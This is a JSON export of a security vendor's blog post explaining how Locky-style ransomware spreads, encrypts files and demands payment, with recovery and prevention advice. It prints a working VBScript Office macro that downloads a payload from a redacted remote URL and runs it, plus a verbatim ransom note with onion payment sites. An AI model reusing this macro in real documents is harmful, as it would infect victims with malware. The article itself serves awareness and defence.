{"id":424,"date":"2016-06-14T07:27:31","date_gmt":"2016-06-14T07:27:31","guid":{"rendered":"http:\/\/www.adlice.com\/?p=424"},"modified":"2023-08-02T09:52:17","modified_gmt":"2023-08-02T09:52:17","slug":"ransomware-spreading-prevention","status":"publish","type":"post","link":"https:\/\/www.adlice.com\/de\/ransomware-spreading-prevention\/","title":{"rendered":"Ransomware : How to protect yourself against them"},"content":{"rendered":"<div class=\"wp-block-ub-table-of-contents-block ub_table-of-contents\" id=\"ub_table-of-contents-74cc7d7c-14e7-433d-be77-73cf169dbb64\" data-linktodivider=\"false\" data-showtext=\"show\" data-hidetext=\"hide\" data-scrolltype=\"auto\" data-enablesmoothscroll=\"false\" data-initiallyhideonmobile=\"false\" data-initiallyshow=\"true\"><div class=\"ub_table-of-contents-header-container\" style=\"\">\n\t\t\t<div class=\"ub_table-of-contents-header\" style=\"text-align: left; \">\n\t\t\t\t<div class=\"ub_table-of-contents-title\"><\/div>\n\t\t\t\t\n\t\t\t<\/div>\n\t\t<\/div><div class=\"ub_table-of-contents-extra-container\" style=\"\">\n\t\t\t<div class=\"ub_table-of-contents-container ub_table-of-contents-1-column \">\n\t\t\t\t<ul style=\"\"><li style=\"\"><a href=\"https:\/\/www.adlice.com\/de\/ransomware-spreading-prevention\/#0-what-is-a-ransomware-\" style=\"\">What is a Ransomware ?<\/a><\/li><li style=\"\"><a href=\"https:\/\/www.adlice.com\/de\/ransomware-spreading-prevention\/#1-ransomware-history\" style=\"\">Ransomware History<\/a><\/li><li style=\"\"><a href=\"https:\/\/www.adlice.com\/de\/ransomware-spreading-prevention\/#2-spreading-methods\" style=\"\">Spreading Methods<\/a><ul><li style=\"\"><a href=\"https:\/\/www.adlice.com\/de\/ransomware-spreading-prevention\/#3-macros\" style=\"\">Macros<\/a><\/li><li style=\"\"><a href=\"https:\/\/www.adlice.com\/de\/ransomware-spreading-prevention\/#4-exploits-\" style=\"\">Exploits<\/a><\/li><\/ul><\/li><li style=\"\"><a href=\"https:\/\/www.adlice.com\/de\/ransomware-spreading-prevention\/#5-encryption-and-ransom-note\" style=\"\">Encryption and Ransom Note<\/a><\/li><li style=\"\"><a href=\"https:\/\/www.adlice.com\/de\/ransomware-spreading-prevention\/#6-disinfection-recovery-of-the-encrypted-files\" style=\"\">Disinfection \/ Recovery of the Encrypted Files<\/a><\/li><li style=\"\"><a href=\"https:\/\/www.adlice.com\/de\/ransomware-spreading-prevention\/#7-prevention\" style=\"\">Prevention<\/a><\/li><li style=\"\"><a href=\"https:\/\/www.adlice.com\/de\/ransomware-spreading-prevention\/#8-conclusion\" style=\"\">Conclusion<\/a><\/li><li style=\"\"><a href=\"https:\/\/www.adlice.com\/de\/ransomware-spreading-prevention\/#9-faq\" style=\"\">FAQ<\/a><\/li><\/ul>\n\t\t\t<\/div>\n\t\t<\/div><\/div>\n\n\n<h4 class=\"wp-block-heading has-accent-color has-text-color\" id=\"0-what-is-a-ransomware-\">What is a Ransomware ?<\/h4>\n\n\n\n<p>A ransomware is typically a software that denies the user to access its personal files and asks for a ransom in return. &#8220;Classic&#8221; ransomware usually starts on system startup and stops the Desktop from appearing.<strong> If the ransom is not paid<\/strong> within a certain period of time, <strong>files will be deleted<\/strong>. A crypto ransomware or cryptoware encrypts the user&#8217;s files and asks the user a payment in exchange of a software that will be able to decrypt them.<\/p>\n\n\n\n<h4 class=\"wp-block-heading has-accent-color has-text-color\" id=\"1-ransomware-history\"><br>Ransomware History<\/h4>\n\n\n\n<p>The concept of ransomware, literally software that asks for a ransom, is known for a long time (<a href=\"https:\/\/en.wikipedia.org\/wiki\/AIDS_(Trojan_horse)\">AIDS Trojan, 1989<\/a>) but these form of malware has had very little impact. Their means of propagation were unsophisticated as well as their encryption routine. <strong>However, year 2013, mark their return<\/strong> with the uprising of the CryptoLocker malware. It differed from its predecessors by using a strong encryption routine and was using the <a href=\"https:\/\/en.wikipedia.org\/wiki\/Zeus_(malware)\">Zeus<\/a> botnet to propagate. In the rest of this article, we will focus specifically on current crypto ransomware, especially Locky.<\/p>\n\n\n\n<h4 class=\"wp-block-heading has-accent-color has-text-color\" id=\"2-spreading-methods\"><br>Spreading Methods<\/h4>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"3-macros\"><br>Macros<\/h5>\n\n\n\n<p>Most of the time, the infection lies in the form of an attached file in a spam. Usually, the file is a <strong>Word or Excel document<\/strong> (respectively .doc and .xls).<\/p>\n\n\n\n<figure class=\"wp-block-image alignnone\"><a href=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/locky-files-virus.png\"><img decoding=\"async\" width=\"846\" height=\"598\" src=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/locky-files-virus.png\" alt=\"ransomware macro email\" class=\"wp-image-426\" srcset=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/locky-files-virus.png 846w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/locky-files-virus-300x212.png 300w\" sizes=\"(max-width: 846px) 100vw, 846px\" \/><\/a><figcaption class=\"wp-element-caption\">A spam mail containing an infected Word file. Source : pulsetheworld.com<\/figcaption><\/figure>\n\n\n\n<p><strong>These documents include a macro<\/strong>, which will be executed when the document is opened. An example of such macro :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>' Location of the payload (hacked WordPress setup). Multiple URls can be present\nurl = \"http:\/\/&#91;redacted]\/wp-includes\/certificates\/xh3uc\"\n\n' Name of the file to be created.\nfileName = \"temp.pif\"\n\n' Obtaining local computer %temp% path using the Environment collection (Shell object)\npathName = CreateObject(\"WScript.Shell\").ExpandEnvironmentStrings(\"%temp%\")\npathName = pathName &amp; '\\'\n\n' Creation of a XMLHttpRequest object (XML request using HTTP) used to download the payload\ndim webRequest: Set webRequest = createobject(\"Microsoft.XMLHTTP\")\n\n' Creation of a Stream Object (ADO) used to manipulate the stream\ndim stream: Set stream = createobject(\"Adodb.Stream\")\n\n' Synchronous connexion established with remote server using GET HTTP method \nwebRequest.Open \"GET\", url, False\n\n' HTTP request to the server\nwebRequest.Send\nwith stream\n    .type = 1 ' Binary data\n    .open ' Creation and opening of a new Stream object\n    .write webRequest.responseBody ' Write the response body (in this case, the payload) in the new object\n    .savetofile pathName &amp;  fileName, 2 ' Save the binary contents of the stream to a file\n\t\t\t\t\t\t\t\t\t\t' Overwrites the file if it already exists\nend with\n\n' Creation of a new Application object and execution of the payload using its contexts.\nSet payload = CreateObject(\"Shell.Application\")\npayload.Open pathName &amp; fileName<\/code><\/pre>\n\n\n\n<p><br><strong>This macro is executed when the document is opened.<\/strong> It downloads the real infection (payload) from a server operated by the malware creator then execute it. In some cases, the ransomware will make a copy the file containing the macro in the shared folders and remote drives of the computer.<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"4-exploits-\"><br><strong>Exploits<\/strong><\/h5>\n\n\n\n<p>Exploit kits use vulnerabilities present in web browsers to automatically download and execute the crypto-ransomware payload. <strong>No user action is required<\/strong>. <a href=\"https:\/\/en.wikipedia.org\/wiki\/Social_engineering_(security)\">Social engineering<\/a> can also be used to trick the user to install the infection by presenting itself, for example like a legit software update.<\/p>\n\n\n\n<h4 class=\"wp-block-heading has-accent-color has-text-color\" id=\"5-encryption-and-ransom-note\"><br>Encryption and Ransom Note<\/h4>\n\n\n\n<p>Once the crypto-ransomware is executed, it will establish a connexion with the offender server and will generate a pair of cryptographic keys. One of them, the public key, will be used to encrypt the files and will be <strong>stored on the victim&#8217;s computer<\/strong>. The other one, the private key, will be <strong>kept on the offender server<\/strong> and could be used to decrypt the files. This is called <a href=\"https:\/\/en.wikipedia.org\/wiki\/Public-key_cryptography\">asymmetric encryption<\/a>. <strong>Encrypted files are thus rendered completely unreadable<\/strong>.<\/p>\n\n\n\n<p>Once this step is completed, the malware removes the <a href=\"https:\/\/en.wikipedia.org\/wiki\/System_Restore\">System Restore Points<\/a> and the content of the <a href=\"https:\/\/fr.wikipedia.org\/wiki\/Shadow_Copy\">Shadow Copy<\/a> that may contain a copy of the files in their unencrypted state. It will then create a note informing the user that its files have been encrypted and containing a link to a <a href=\"https:\/\/www.adlice.com\/malware-cryptominer\/\" target=\"_blank\" rel=\"noreferrer noopener\">Bitcoin container<\/a> where the ransom should be paid (usually between 0.5 and 1.5 bitcoins).<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>@@@@@@@ NOT YOUR LANGUAGE? USE https:\/\/translate.google.com\n\n@@@@@@@ What happened to your files ?\n@@@@@@@ All of your files were protected by a strong encryption with RZA4096\n@@@@@@@ More information about the en-Xryption keys using RZA4096 can be found here: http:\/\/en.wikipedia.org\/wiki\/RSA_(cryptosystem)\n\n@@@@@@@ How did this happen ?\n@@@@@@@ !!! Specially for your PC was generated personal RZA4096 Key , both publik and private.\n@@@@@@@ !!! ALL YOUR FILES were en-Xrypted with the publik key, which has been transferred to your computer via the Internet.\n@@@@@@@ !!! Decrypting of your files is only possible with the help of the privatt key and de-crypt program , which is on our Secret Server\n\n@@@@@@@ What do I do ?\n@@@@@@@ So , there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way\n@@@@@@@ If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment\n\n\nYour personal ID: &#91;Redacted]\n\nFor more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:\n\n1 - http:\/\/gvxtkcbjnslm5vnt.onion.to\n2 - http:\/\/gvxtkcbjnslm5vnt.onion.cab\n3 - http:\/\/gvxtkcbjnslm5vnt.onion.city\n\nIf for some reasons the addresses are not available, follow these steps:\n\n1 - Download and install tor-browser: http:\/\/www.torproject.org\/projects\/torbrowser.html.en\n2 - After a successful installation, run the browser\n3 - Type in the address bar - http:\/\/gvxtkcbjnslm5vnt.onion\n4 - Follow the instructions on the site\n\nBe sure to copy your personal ID and the instruction link to your notepad not to lose them.<\/code><\/pre>\n\n\n\n<p><br>Ransomware has much benefited from the bitcoin development since no identification is required to open an account, which allows them to remain anonymous. A screenshot of the website gvxtkcbjnslm5vnt.onion, only accessible using the <a href=\"https:\/\/www.adlice.com\/darknet-explained\/\" target=\"_blank\" rel=\"noreferrer noopener\">Tor network<\/a>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png\"><img decoding=\"async\" width=\"754\" height=\"444\" src=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png\" alt=\"ransomware id\" class=\"wp-image-425\" srcset=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png 754w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612-300x177.png 300w\" sizes=\"(max-width: 754px) 100vw, 754px\" \/><\/a><\/figure>\n\n\n\n<p>If the ransom is paid, the user will usually receive a utility containing the private key that can be used to decrypt the files. However, if he waits too long, <strong>the private key will be deleted of the server, making the decryption impossible<\/strong>.<\/p>\n\n\n\n<h4 class=\"wp-block-heading has-accent-color has-text-color\" id=\"6-disinfection-recovery-of-the-encrypted-files\"><br>Disinfection \/ Recovery of the Encrypted Files<\/h4>\n\n\n\n<p><strong>There is no universal solution<\/strong>.<br>It is advised to submit one of them to <a href=\"https:\/\/id-ransomware.malwarehunterteam.com\/\">ID Ransomware<\/a> which will analyse it. The application will be able to tell if the version of the malware is known and if a free decryption tool has been released.<\/p>\n\n\n\n<h4 class=\"wp-block-heading has-accent-color has-text-color\" id=\"7-prevention\"><br>Prevention<\/h4>\n\n\n\n<p>Conventional antivirus software is not really effective against such threats. When the infection is detected, most if not all the data is usually already encrypted. Furthermore, the rate detection of the payload is quite low. However, some tools were specially designed for this purpose. These include Malwarebytes anti-ransomware and Bitdefender anti-ransomware. <\/p>\n\n\n\n<p>They use a behavioural-based approach to identify crypto-ransomware. More specifically, running processes are watched and <strong>if one of them modifies the headers of multiple files, the software terminates it forcefully<\/strong>. However, they are not infallible and it is very likely that <strong>specially deceptive variants<\/strong> will be released in a near future.<\/p>\n\n\n\n<p>Another approach, more restrictive but more effective, is to define protected areas in the filesystem <strong>where suspicious process cannot write<\/strong>, which are therefore protected against any ransomware.<br>This feature was added in <a href=\"https:\/\/www.adlice.com\/roguekiller\/\" target=\"_blank\" rel=\"noreferrer noopener\">RogueKiller V14<\/a>, under the form of the <a href=\"https:\/\/www.adlice.com\/docs\/roguekiller\/getting-started\/settings\/\">DocLock protection module<\/a>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"425\" src=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2019\/10\/rk14_detection2-1024x425.png\" alt=\"roguekiller ransomware protection\" class=\"wp-image-3564\" srcset=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2019\/10\/rk14_detection2-1024x425.png 1024w, https:\/\/www.adlice.com\/wp-content\/uploads\/2019\/10\/rk14_detection2-300x125.png 300w, https:\/\/www.adlice.com\/wp-content\/uploads\/2019\/10\/rk14_detection2.png 1778w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>A good practice is also to <strong>keep software updated<\/strong> to limit the attack surface regarding exploits and to <strong>disallow the automatic execution of macros<\/strong>. <a href=\"https:\/\/www.bdrsuite.com\/endpoint-backup\/\" target=\"_blank\" rel=\"noreferrer noopener\">Making backups of personal documents<\/a> on external drives or cloud services are also <strong>strongly recommended<\/strong>.<\/p>\n\n\n\n<h4 class=\"wp-block-heading has-accent-color has-text-color\" id=\"8-conclusion\"><br>Conclusion<\/h4>\n\n\n\n<p>Ransomware and specially crypto-ransomwares are expected to be developed further in the future. Indeed, those are <strong>very profitable and relatively easy to write<\/strong>. Software-based protections exist but it would be unwise to trust them blindly. The best solution for the time being seemed to do regular<strong> backup of personal data<\/strong> so as to have a copy at any time. This copy could also be used in case of hard drive failure, which can happen at any time and where there is a high probability that the data is <strong>completely unrecoverable.<\/strong><\/p>\n\n\n\n<h4 class=\"wp-block-heading has-accent-color has-text-color\" id=\"9-faq\"><br>FAQ<\/h4>\n\n\n\n<ul class=\"wp-block-list\">\n<li> <strong>Should I pay ?<\/strong><br>It is recommended not to give in to blackmail. Indeed, it only encourages the perpetrators and sometimes even after paying, files cannot be decrypted. However, if the data is really valuable and that any recovery attempts have failed, it is a solution.<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>I won&#8217;t pay. Should I delete the files affected ?<\/strong><br>It is advised to keep the data in case a free decrypting tool is released in the future.<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Why not develop free decrypting tools for each variant of the malware ?<\/strong><br>The development of such tools is only made possible when cryptographic flaws are discovered or when private keys are released, for example when a server is seized.<br>These, however, are very rare occurrences.<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>I&#8217;ve got plenty of time and a powerful computer. Should I try to find the private key using brute force attack ?<\/strong><br>Usually, recent crypto-ransomware uses <a href=\"https:\/\/en.wikipedia.org\/wiki\/RSA_(cryptosystem)\">RSA key<\/a> of 2048-bit length or more. Experts agree that these are uncrackable using brute force.<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Why don&#8217;t we systematically seize servers \/ bitcoin accounts used by the perpetrators ?<\/strong><br>Justice is working on it but it is a long and complicated process. In addition to this, hacked computers are often used for these purposed. However, <a href=\"https:\/\/en.wikipedia.org\/wiki\/Operation_Tovar\">Operation Tovar<\/a> showed that it was possible by ending the CryptoLocker infection and recovering the database containing private keys.<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Ransomware became the threats of the web. Learn how they work, their effects, and how to protect yourself from such malware.<\/p>\n","protected":false},"author":1,"featured_media":425,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[36],"tags":[7,126,370,8,128,127],"class_list":["post-424","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-analysis","tag-analysis","tag-cryptolocker","tag-locky","tag-malware","tag-ransom","tag-ransomware","category-36","description-off"],"views":3788,"yoast_score":61,"yoast_readable":60,"featured_image_src":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png","author_info":{"display_name":"tigzy","author_link":"https:\/\/www.adlice.com\/de\/author\/tigzy\/"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.1.1 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Ransomware : How to protect yourself ? | Definition \u2022 Adlice Software<\/title>\n<meta name=\"description\" content=\"Ransomware are on the rise and they hit everyone, individuals or companies. Learn how they work and to protect yourself from such malware.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.adlice.com\/ransomware-spreading-prevention\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Ransomware : How to protect yourself ? | Definition \u2022 Adlice Software\" \/>\n<meta property=\"og:description\" content=\"Ransomware are on the rise and they hit everyone, individuals or companies. Learn how they work and to protect yourself from such malware.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.adlice.com\/ransomware-spreading-prevention\/\" \/>\n<meta property=\"og:site_name\" content=\"Adlice Software\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/RogueKiller\" \/>\n<meta property=\"article:published_time\" content=\"2016-06-14T07:27:31+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2023-08-02T09:52:17+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png\" \/>\n\t<meta property=\"og:image:width\" content=\"754\" \/>\n\t<meta property=\"og:image:height\" content=\"444\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"tigzy\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@AdliceSoftware\" \/>\n<meta name=\"twitter:site\" content=\"@AdliceSoftware\" \/>\n<meta name=\"twitter:label1\" content=\"Verfasst von\" \/>\n\t<meta name=\"twitter:data1\" content=\"tigzy\" \/>\n\t<meta name=\"twitter:label2\" content=\"Gesch\u00e4tzte Lesezeit\" \/>\n\t<meta name=\"twitter:data2\" content=\"6\u00a0Minuten\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.adlice.com\/ransomware-spreading-prevention\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.adlice.com\/ransomware-spreading-prevention\/\"},\"author\":{\"name\":\"tigzy\",\"@id\":\"https:\/\/www.adlice.com\/#\/schema\/person\/a02b30804320a4059d268dc2567a307d\"},\"headline\":\"Ransomware : How to protect yourself against them\",\"datePublished\":\"2016-06-14T07:27:31+00:00\",\"dateModified\":\"2023-08-02T09:52:17+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.adlice.com\/ransomware-spreading-prevention\/\"},\"wordCount\":1108,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/www.adlice.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.adlice.com\/ransomware-spreading-prevention\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png\",\"keywords\":[\"analysis\",\"cryptolocker\",\"locky\",\"malware\",\"ransom\",\"ransomware\"],\"articleSection\":[\"Analysis\"],\"inLanguage\":\"de\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.adlice.com\/ransomware-spreading-prevention\/\",\"url\":\"https:\/\/www.adlice.com\/ransomware-spreading-prevention\/\",\"name\":\"Ransomware : How to protect yourself ? | Definition \u2022 Adlice Software\",\"isPartOf\":{\"@id\":\"https:\/\/www.adlice.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.adlice.com\/ransomware-spreading-prevention\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.adlice.com\/ransomware-spreading-prevention\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png\",\"datePublished\":\"2016-06-14T07:27:31+00:00\",\"dateModified\":\"2023-08-02T09:52:17+00:00\",\"description\":\"Ransomware are on the rise and they hit everyone, individuals or companies. Learn how they work and to protect yourself from such malware.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.adlice.com\/ransomware-spreading-prevention\/#breadcrumb\"},\"inLanguage\":\"de\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.adlice.com\/ransomware-spreading-prevention\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\/\/www.adlice.com\/ransomware-spreading-prevention\/#primaryimage\",\"url\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png\",\"contentUrl\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png\",\"width\":754,\"height\":444},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.adlice.com\/ransomware-spreading-prevention\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.adlice.com\/de\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Ransomware : How to protect yourself against them\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.adlice.com\/#website\",\"url\":\"https:\/\/www.adlice.com\/\",\"name\":\"Adlice Software\",\"description\":\"Anti-malware and analysis tools\",\"publisher\":{\"@id\":\"https:\/\/www.adlice.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.adlice.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.adlice.com\/#organization\",\"name\":\"Adlice Software\",\"url\":\"https:\/\/www.adlice.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\/\/www.adlice.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2020\/05\/B1rTNpTG_400x40_10.png\",\"contentUrl\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2020\/05\/B1rTNpTG_400x40_10.png\",\"width\":276,\"height\":276,\"caption\":\"Adlice Software\"},\"image\":{\"@id\":\"https:\/\/www.adlice.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/RogueKiller\",\"https:\/\/x.com\/AdliceSoftware\",\"https:\/\/fr.linkedin.com\/company\/adlice-software\",\"https:\/\/www.youtube.com\/channel\/UC4CQ-gIZMGWxl-auf0QqYhQ\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.adlice.com\/#\/schema\/person\/a02b30804320a4059d268dc2567a307d\",\"name\":\"tigzy\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\/\/www.adlice.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/d81e380961b1b69969fa84994ad1e4cba26afe93a49d8dd3148e9c33ffe4ccac?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/d81e380961b1b69969fa84994ad1e4cba26afe93a49d8dd3148e9c33ffe4ccac?s=96&d=mm&r=g\",\"caption\":\"tigzy\"},\"description\":\"Founder and owner of Adlice Software, Tigzy started as lead developer on the popular Anti-malware called RogueKiller. Involved in all the Adlice projects as lead developer, Tigzy is also doing research and reverse engineering as well as writing blog posts.\",\"url\":\"https:\/\/www.adlice.com\/de\/author\/tigzy\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Ransomware : How to protect yourself ? | Definition \u2022 Adlice Software","description":"Ransomware are on the rise and they hit everyone, individuals or companies. Learn how they work and to protect yourself from such malware.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.adlice.com\/ransomware-spreading-prevention\/","og_locale":"de_DE","og_type":"article","og_title":"Ransomware : How to protect yourself ? | Definition \u2022 Adlice Software","og_description":"Ransomware are on the rise and they hit everyone, individuals or companies. Learn how they work and to protect yourself from such malware.","og_url":"https:\/\/www.adlice.com\/ransomware-spreading-prevention\/","og_site_name":"Adlice Software","article_publisher":"https:\/\/www.facebook.com\/RogueKiller","article_published_time":"2016-06-14T07:27:31+00:00","article_modified_time":"2023-08-02T09:52:17+00:00","og_image":[{"width":754,"height":444,"url":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png","type":"image\/png"}],"author":"tigzy","twitter_card":"summary_large_image","twitter_creator":"@AdliceSoftware","twitter_site":"@AdliceSoftware","twitter_misc":{"Verfasst von":"tigzy","Gesch\u00e4tzte Lesezeit":"6\u00a0Minuten"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.adlice.com\/ransomware-spreading-prevention\/#article","isPartOf":{"@id":"https:\/\/www.adlice.com\/ransomware-spreading-prevention\/"},"author":{"name":"tigzy","@id":"https:\/\/www.adlice.com\/#\/schema\/person\/a02b30804320a4059d268dc2567a307d"},"headline":"Ransomware : How to protect yourself against them","datePublished":"2016-06-14T07:27:31+00:00","dateModified":"2023-08-02T09:52:17+00:00","mainEntityOfPage":{"@id":"https:\/\/www.adlice.com\/ransomware-spreading-prevention\/"},"wordCount":1108,"commentCount":0,"publisher":{"@id":"https:\/\/www.adlice.com\/#organization"},"image":{"@id":"https:\/\/www.adlice.com\/ransomware-spreading-prevention\/#primaryimage"},"thumbnailUrl":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png","keywords":["analysis","cryptolocker","locky","malware","ransom","ransomware"],"articleSection":["Analysis"],"inLanguage":"de"},{"@type":"WebPage","@id":"https:\/\/www.adlice.com\/ransomware-spreading-prevention\/","url":"https:\/\/www.adlice.com\/ransomware-spreading-prevention\/","name":"Ransomware : How to protect yourself ? | Definition \u2022 Adlice Software","isPartOf":{"@id":"https:\/\/www.adlice.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.adlice.com\/ransomware-spreading-prevention\/#primaryimage"},"image":{"@id":"https:\/\/www.adlice.com\/ransomware-spreading-prevention\/#primaryimage"},"thumbnailUrl":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png","datePublished":"2016-06-14T07:27:31+00:00","dateModified":"2023-08-02T09:52:17+00:00","description":"Ransomware are on the rise and they hit everyone, individuals or companies. Learn how they work and to protect yourself from such malware.","breadcrumb":{"@id":"https:\/\/www.adlice.com\/ransomware-spreading-prevention\/#breadcrumb"},"inLanguage":"de","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.adlice.com\/ransomware-spreading-prevention\/"]}]},{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/www.adlice.com\/ransomware-spreading-prevention\/#primaryimage","url":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png","contentUrl":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png","width":754,"height":444},{"@type":"BreadcrumbList","@id":"https:\/\/www.adlice.com\/ransomware-spreading-prevention\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.adlice.com\/de\/"},{"@type":"ListItem","position":2,"name":"Ransomware : How to protect yourself against them"}]},{"@type":"WebSite","@id":"https:\/\/www.adlice.com\/#website","url":"https:\/\/www.adlice.com\/","name":"Adlice Software","description":"Anti-malware and analysis tools","publisher":{"@id":"https:\/\/www.adlice.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.adlice.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de"},{"@type":"Organization","@id":"https:\/\/www.adlice.com\/#organization","name":"Adlice Software","url":"https:\/\/www.adlice.com\/","logo":{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/www.adlice.com\/#\/schema\/logo\/image\/","url":"https:\/\/www.adlice.com\/wp-content\/uploads\/2020\/05\/B1rTNpTG_400x40_10.png","contentUrl":"https:\/\/www.adlice.com\/wp-content\/uploads\/2020\/05\/B1rTNpTG_400x40_10.png","width":276,"height":276,"caption":"Adlice 